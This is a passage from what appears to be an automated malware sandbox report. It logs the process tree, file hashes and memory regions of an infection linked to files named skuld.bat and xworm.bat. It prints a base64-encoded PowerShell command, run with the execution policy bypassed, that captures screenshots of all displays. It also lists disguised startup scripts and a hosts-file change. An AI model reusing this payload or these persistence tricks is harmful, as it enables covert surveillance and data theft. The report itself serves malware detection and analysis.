                          powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                          7⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          PID:3692
                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cfazm51b\cfazm51b.cmdline"
                              8⤵
                              PID:3792
                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES818F.tmp" "c:\Users\Admin\AppData\Local\Temp\cfazm51b\CSC8BC65533630D41A3BCD380E4B7AD38A9.TMP"
                                  9⤵
                                  PID:5076
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
  1⤵
  PID:3760
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
  1⤵
  PID:4968
• C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
  1⤵
  PID:1168
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
  1⤵
  PID:2552
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
  1⤵
  • Modifies data under HKEY_USERS
  PID:3540
• C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
  1⤵
  PID:2192
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
  1⤵
  PID:2556
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
  1⤵
  PID:552
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
  1⤵
  PID:2816
• C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3608,i,15140928051103392835,1612840580898364401,262144 --variations-seed-version --mojo-platform-channel-handle=4116 /prefetch:8
  1⤵
  PID:4748
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
  1⤵
  PID:2076

Network

MITRE ATT&CK Enterprise v15

Downloads

• C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
  Filesize: 328B
  MD5: 679ad75389f878484fb4041d03fbb26e
  SHA1: b195403a9fd49c68f829a3eb1f5c7d934b76e8ad
  SHA256: 55d7e24790ec57712cb868dc0f56af5720cd97bb2fb7219fcbd9c3dfe596823e
  SHA512: 3d0bc8e8be16d494a64b49a599744e8e78704c33c3d56f3a997dbab2766c21f6f8d8ed2adf73360588967b41b429aca42c556e25cbb7c59759030edee318dc02

• C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 3KB
  MD5: 661739d384d9dfd807a089721202900b
  SHA1: 5b2c5d6a7122b4ce849dc98e79a7713038feac55
  SHA256: 70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
  SHA512: 81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
  Filesize: 53KB
  MD5: a26df49623eff12a70a93f649776dab7
  SHA1: efb53bd0df3ac34bd119adf8788127ad57e53803
  SHA256: 4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
  SHA512: e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
  Filesize: 2KB
  MD5: e3acf7533677fd62b80273a1912a1069
  SHA1: dc37d36778f783e5b6bb3ca022c8ae9ae1509269
  SHA256: f894f1ecc9b9bcd699643d261a23161ed2474ca6bb4af7f89ae2b24119f73050
  SHA512: 86ad56420f4d263e9276070bbabd4510ecb51d76a6f4094fca7fd6761368a1842c778f560570f3a3a0bfd4c4636c16b010c1407328320b14a0fcce974adb1adc

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
  Filesize: 2KB
  MD5: 005bc2ef5a9d890fb2297be6a36f01c2
  SHA1: 0c52adee1316c54b0bfdc510c0963196e7ebb430
  SHA256: 342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d
  SHA512: f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: 12c844ed8342738dacc6eb0072c43257
  SHA1: b7f2f9e3ec4aaf5e2996720f129cd64887ac91d7
  SHA256: 2afeb7db4e46d3c1524512a73448e9cd0121deec761d8aa54fa9fe8b56df7519
  SHA512: e3de9103533a69cccc36cd377297ba3ec9bd7a1159e1349d2cc01ab66a88a5a82b4ee3af61fab586a0cdfab915c7408735439fd0462c5c2cc2c787cb0765766a

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: 77d622bb1a5b250869a3238b9bc1402b
  SHA1: d47f4003c2554b9dfc4c16f22460b331886b191b
  SHA256: f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
  SHA512: d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: 15dde0683cd1ca19785d7262f554ba93
  SHA1: d039c577e438546d10ac64837b05da480d06bf69
  SHA256: d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961
  SHA512: 57c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: 9d9e705ca093c4764faefe905fe84345
  SHA1: c5e62bb784f8a9e8d25809dc80cc1302f38988d5
  SHA256: e613602ca5bb32b5c80fd0108e4bda25a38dba0edd72fdc1b20ac02ab8b697a8
  SHA512: a31bae5e43a9a666cdd817d6494ca64915abc6f887a9e00b01d5ce413768f3baee9053810e27d94172fa4c803f366f9fce62a06a2d4cd070708481e2338e8311

• C:\Users\Admin\AppData\Local\Temp\D3yNiqEK91\Display (1).png
  Filesize: 193KB
  MD5: df380fe757cf1d60110ec925c5e573f2
  SHA1: 3c9b62065ccbee8336c82e176e6a7fc39eac8b87
  SHA256: 22982a85edcd122586edcd000373a51e893ce5d32527fb0f1e54ac13b99f0240
  SHA512: 4b27ee1892143367fdbb17a3eda8ed64a8d9f06cfa5d31a1b40c5c279f982c60d2fbe4121c730573f93dc6a2d337456b36dfe46b2a0a86e64e2a30dce3cc3942

• C:\Users\Admin\AppData\Local\Temp\RES818F.tmp
  Filesize: 1KB
  MD5: 4a61e48794d09a2db8b2f0de09434cc5
  SHA1: 4ec7704ee98cf54f3027c147543fe9bf1dade780
  SHA256: 69798f8dcb03648e7209a010aaa55b9e90773c45b6fd82cd6f029f2ec8d5a9cf
  SHA512: da60d8d5b1d75f7df11fb5ce69af5a40a0d8f0502f189505a237f1603149e424b35fc1e355d5e33184a2dd30e08d618daece498d139f38f19158ef0cb7caa901

• C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dddw2fey.4sf.ps1
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

• C:\Users\Admin\AppData\Local\Temp\cfazm51b\cfazm51b.dll
  Filesize: 4KB
  MD5: 1c4b04aec5d48b010251e077f1fdbf68
  SHA1: fcaead9eb9dca67eb6f02c810d33b1c4d78a42fe
  SHA256: ed8784275f386227da24f3c8f3ed30f0f9a155b883b246476d126b527987f2ef
  SHA512: 383bdaaa0ed756bf5716da2f4f37ef274bb8f139dbcb551cc01af35240741add5f06efeba8b2636b4575044b85c8cee70882c63482be0f2eb031bba658701887

• C:\Users\Admin\AppData\Local\Temp\skuld.bat
  Filesize: 12.8MB
  MD5: 1f55ef1e5c6dcae77ee50d8233e1129d
  SHA1: dbafaf20471dd8191fd31e2ea8c1b65205efeeab
  SHA256: d4ddc23d57ac6c7c52eb057c9c3adc0db5567c662974a5cc7ef9ad3bb2c91f47
  SHA512: d05ce7bc83e55d8f2cdcdb5e7559d1bfe0b62ab7b23bc0591960cc0f3a990988d6b05c1b94aa4c84d070c7dbfcd3aa149b59303c19454e096249699eacd3705d

• C:\Users\Admin\AppData\Local\Temp\xworm.bat
  Filesize: 155KB
  MD5: 45f7e10fb33d48463a55c89d40d4824a
  SHA1: b95ef1efdb8f79c468cd4cdcd85c8dd54087d9e2
  SHA256: 7f37dbc61973ca542c89303b1df4f33ccc5ac442a16f497b115236bb58664d2f
  SHA512: 43ad9acb9e43063a2d83045a24ff24ea7e211c05cdfc2b202f5cf1bd4e73ee9a134802c9aec22e7b941d4eec905055426b313ea30c7a55a6bb2ca467e77325ad

• C:\Users\Admin\AppData\Roaming\$phantom-startup_str_870.bat
  Filesize: 26.0MB
  MD5: b6043c62279ba9658cb83d9a25e5a23b
  SHA1: f707fc5bb01d16e151fe115dccc730819a81da88
  SHA256: edd80a73c65730613d5eda3a78a5a79d7acf9c93b054882ff0f57f0cddfae36c
  SHA512: 273c82e5f1a80d810874fcea5e03527bf0fe39663a875444ae15194a535b5ba37340193074abcb7534a17d0a99e52b77029a7a659505f488ec8717db54db7d69

• C:\Users\Admin\AppData\Roaming\$phantom-startup_str_870.vbs
  Filesize: 124B
  MD5: d47fb9c6ab8b21c52917923b2144eff2
  SHA1: ab7ee7345e6d4b96f2682abab1840e409e7b4546
  SHA256: ee667a9e2a8c9390f0e2039bcb9d2c274f7bcfda671e652063038280d1ef71c8
  SHA512: 6c3495eac2ad9b3180dcc519a50e08edfb130966e421fb61ee534a75c6465ec3d5189910fda57246a7e1258c6de8ce45e2493df3dcdacb3fdfa55e1358a5876c

• C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe

                                                                                                                                          Filesize

                                                                                                                                          442KB

                                                                                                                                          MD5

                                                                                                                                          04029e121a0cfa5991749937dd22a1d9

                                                                                                                                          SHA1

                                                                                                                                          f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                                                                                                                                          SHA256

                                                                                                                                          9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                                                                                                                                          SHA512

                                                                                                                                          6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Windows_Log_927.vbs

                                                                                                                                          Filesize

                                                                                                                                          115B

                                                                                                                                          MD5

                                                                                                                                          218455e7578c864e6be4c255941661a6

                                                                                                                                          SHA1

                                                                                                                                          cb4be5787053e6f3eefaa3a4c02ab05854f5770e

                                                                                                                                          SHA256

                                                                                                                                          e5953ed297587047109871a8d2a2149ef8d25300557a98f8461792c20ffe5955

                                                                                                                                          SHA512

                                                                                                                                          2f78833b831fc05f3d5f7c3e952980abb2462194627bf5ad3eedf14a7f0a6a359b56b80c9e10a7acdf70f2fa704768d0a2cee277adc4d08cf40c38ae71d9f106

                                                                                                                                        • C:\Windows\System32\drivers\etc\hosts

                                                                                                                                          Filesize

                                                                                                                                          2KB

                                                                                                                                          MD5

                                                                                                                                          6e2386469072b80f18d5722d07afdc0b

                                                                                                                                          SHA1

                                                                                                                                          032d13e364833d7276fcab8a5b2759e79182880f

                                                                                                                                          SHA256

                                                                                                                                          ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

                                                                                                                                          SHA512

                                                                                                                                          e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

                                                                                                                                        • \??\c:\Users\Admin\AppData\Local\Temp\cfazm51b\CSC8BC65533630D41A3BCD380E4B7AD38A9.TMP

                                                                                                                                          Filesize

                                                                                                                                          652B

                                                                                                                                          MD5

                                                                                                                                          a46f5bef18756cf1bcb2d093ea0105a1

                                                                                                                                          SHA1

                                                                                                                                          7624e6dbe7565882b7b143652e5e24e4f9aa53bd

                                                                                                                                          SHA256

                                                                                                                                          7542195bda4ece803403f340cb81a77e13e33ff6ff61af18ca54be28a714cd2b

                                                                                                                                          SHA512

                                                                                                                                          bbdfcdfdddaf937e8618db6c67328a29031d2c97d21f2a4117d5fa453c799630600c19e956f2015aec4bc97544d5d165cb0fc5039547bdf9c5e7285122321dba

                                                                                                                                        • \??\c:\Users\Admin\AppData\Local\Temp\cfazm51b\cfazm51b.0.cs

                                                                                                                                          Filesize

                                                                                                                                          1004B

                                                                                                                                          MD5

                                                                                                                                          c76055a0388b713a1eabe16130684dc3

                                                                                                                                          SHA1

                                                                                                                                          ee11e84cf41d8a43340f7102e17660072906c402

                                                                                                                                          SHA256

                                                                                                                                          8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

                                                                                                                                          SHA512

                                                                                                                                          22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

                                                                                                                                        • \??\c:\Users\Admin\AppData\Local\Temp\cfazm51b\cfazm51b.cmdline

                                                                                                                                          Filesize

                                                                                                                                          607B

                                                                                                                                          MD5

                                                                                                                                          de44462ae3ad140205accd11df687b59

                                                                                                                                          SHA1

                                                                                                                                          4eba67a423e7f9a1fe7924f9dd8562cb4f8dc7d2

                                                                                                                                          SHA256

                                                                                                                                          730233348624bf79aecfeba8d29bacc5d77b95d25e73fe2122403d834da47c2d

                                                                                                                                          SHA512

                                                                                                                                          11643ec48b8351372a0ccff4094292a34d74912dce7dd7bea175844c47f1f798123f8cb5f6f4dad26e1128d5c1205d57039eff2a287613c3ed5a3f5263063027

                                                                                                                                        • memory/756-106-0x00007FFC8C150000-0x00007FFC8C160000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          64KB

                                                                                                                                        • memory/904-109-0x00007FFC8C150000-0x00007FFC8C160000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          64KB

                                                                                                                                        • memory/1076-113-0x00007FFC8C150000-0x00007FFC8C160000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          64KB

                                                                                                                                        • memory/1168-112-0x00007FFC8C150000-0x00007FFC8C160000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          64KB

                                                                                                                                        • memory/1280-114-0x00007FFC8C150000-0x00007FFC8C160000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          64KB

                                                                                                                                        • memory/1572-119-0x00007FFC8C150000-0x00007FFC8C160000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          64KB

                                                                                                                                        • memory/1712-108-0x00007FFC8C150000-0x00007FFC8C160000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          64KB

                                                                                                                                        • memory/1756-105-0x00007FFC8C150000-0x00007FFC8C160000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          64KB

                                                                                                                                        • memory/1820-111-0x00007FFC8C150000-0x00007FFC8C160000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          64KB

                                                                                                                                        • memory/2192-115-0x00007FFC8C150000-0x00007FFC8C160000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          64KB

                                                                                                                                        • memory/2896-107-0x00007FFC8C150000-0x00007FFC8C160000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          64KB

                                                                                                                                        • memory/3020-110-0x00007FFC8C150000-0x00007FFC8C160000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          64KB

                                                                                                                                        • memory/3304-32-0x00007FFCAD6B0000-0x00007FFCAE171000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          10.8MB

                                                                                                                                        • memory/3304-19-0x00007FFCAD6B0000-0x00007FFCAE171000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          10.8MB

                                                                                                                                        • memory/3316-40-0x00007FFCAD6B0000-0x00007FFCAE171000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          10.8MB

                                                                                                                                        • memory/3316-12-0x00007FFCAD6B0000-0x00007FFCAE171000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          10.8MB

                                                                                                                                        • memory/3316-51-0x00007FFCAD6B0000-0x00007FFCAE171000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          10.8MB

                                                                                                                                        • memory/3316-7-0x0000020474190000-0x00000204741B2000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          136KB

                                                                                                                                        • memory/3316-11-0x00007FFCAD6B0000-0x00007FFCAE171000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          10.8MB

                                                                                                                                        • memory/3316-0-0x00007FFCAD6B3000-0x00007FFCAD6B5000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          8KB

                                                                                                                                        • memory/3316-17-0x00000204284A0000-0x0000020429B54000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          22.7MB

                                                                                                                                        • memory/3316-13-0x0000020474580000-0x00000204745C4000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          272KB

                                                                                                                                        • memory/3316-14-0x0000020474650000-0x00000204746C6000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          472KB

                                                                                                                                        • memory/3316-15-0x0000020428490000-0x0000020428498000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          32KB

                                                                                                                                        • memory/3588-102-0x00007FFC8C150000-0x00007FFC8C160000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          64KB

                                                                                                                                        • memory/3588-52-0x0000000003060000-0x000000000308A000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          168KB

                                                                                                                                        • memory/3692-228-0x0000016D1F100000-0x0000016D1F108000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          32KB

                                                                                                                                        • memory/4168-276-0x000001AB2ADB0000-0x000001AB2ADC0000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          64KB

                                                                                                                                        • memory/4728-231-0x00000238EBDD0000-0x00000238EBDF0000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          128KB

                                                                                                                                        • memory/4728-230-0x00000238EBDC0000-0x00000238EBDC8000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          32KB

                                                                                                                                        • memory/4968-116-0x00007FFC8C150000-0x00007FFC8C160000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          64KB